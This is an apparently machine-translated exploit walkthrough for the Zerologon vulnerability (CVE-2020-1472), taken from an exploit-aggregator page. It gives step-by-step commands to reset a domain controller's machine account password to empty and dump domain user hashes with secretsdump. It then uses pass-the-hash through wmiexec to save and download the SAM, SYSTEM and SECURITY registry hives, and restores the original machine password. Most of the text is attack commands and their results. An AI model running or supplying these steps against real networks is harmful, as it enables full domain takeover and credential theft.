## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-SHANFENGLAN-CVE-2020-1472
# cve-2020-1472
@toc
# Принцип уязвимости
Принцип довольно сложный, если интересно, можно посмотреть статью по ссылке ниже: https://www.freebuf.com/articles/system/249860.html
# Эксплуатация
## 1\. Изменение файла impacket.dcerpc.v5.nrpc
Необходимо использовать файл https://github.com/SecureAuthCorp/impacket/edit/master/impacket/dcerpc/v5/nrpc.py для замены локального файла nrpc. Путь к локальному файлу nrpc: C:\Users\Administrator\AppData\Local\Programs\Python\Python38\Lib\site-packages\impacket\dcerpc\v5\nrpc.py
## 2\. Обнуление пароля учетной записи машины yukong$
`python cve-2020-1472-exploit.py 机器账户名 ip`  И обнаружили, что пароль учетной записи машины обнулен, 31dc... представляет пустой пароль. 
> Способы получения учетной записи целевой машины или NetBIOS-имени:
>
> 1. net view  Имя сервера с добавлением $ является именем машины, например, lisi$ или yukong$.
>
> 2. nbtstat -A ip  Существует много способов определить IP контроллера домена, например:
> 3. Проверить хосты с открытым портом 53
> 4. net time — вывод вернет имя хоста контроллера домена, затем пинговать
> 5. systeminfo — посмотреть значение в разделе домена, пропинговать — получим IP контроллера домена
> 6. Посмотреть DNS своего хоста
>
## 3\. Чтение пароля администратора
`python secretsdump.py test.com/some-email@example.com -no-pass`  Обнаружили, что теперь можно использовать учетную запись машины с пустым паролем для чтения хешей пользователей на контроллере домена.
## 4\. Загрузка файла sam цели для подготовки к восстановлению пароля машины
python wmiexec.py -hashes :3dbde697d71690a769204beb12283678 test/some-email@example.com reg save HKLM\SYSTEM system.save reg save HKLM\SAM sam.save reg save HKLM\SECURITY security.save
get system.save get sam.save get security.save
del /f system.save del /f sam.save del /f security.save
exit
 После выполнения в папке со скриптом wmiexec можно найти загруженные файлы: 
> python secretsdump.py -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 test.com/some-email@example.com -use-vss Это команда не выполнилась
## 5\. Взлом файла sam для просмотра предыдущего пароля машины
`python secretsdump.py -sam sam.save -system system.save -security security.save LOCAL`  Сохраните пароль, обведенный красным — это предыдущий пароль машины, а именно aad3b435b51404eeaad3b435b51404ee:999699ceadecae87fef9a2040ef2213a.
## 6\. Восстановление пароля машины yukong$
python reinstall_original_pw.py yukong$ 192.168.124.142 999699ceadecae87fef9a2040ef2213a 
## 7\. Проверка успешности восстановления пароля
python secretsdump.py test.com/administrator:some-email@example.com -just-dc-user yukong$ python secretsdump.py -hashes aad3b435b51404eeaad3b435b51404ee:3dbde697d71690a769204beb12283678 test/some-email@example.com -just-dc-user yukong$  Обнаружено, что восстановление прошло успешно.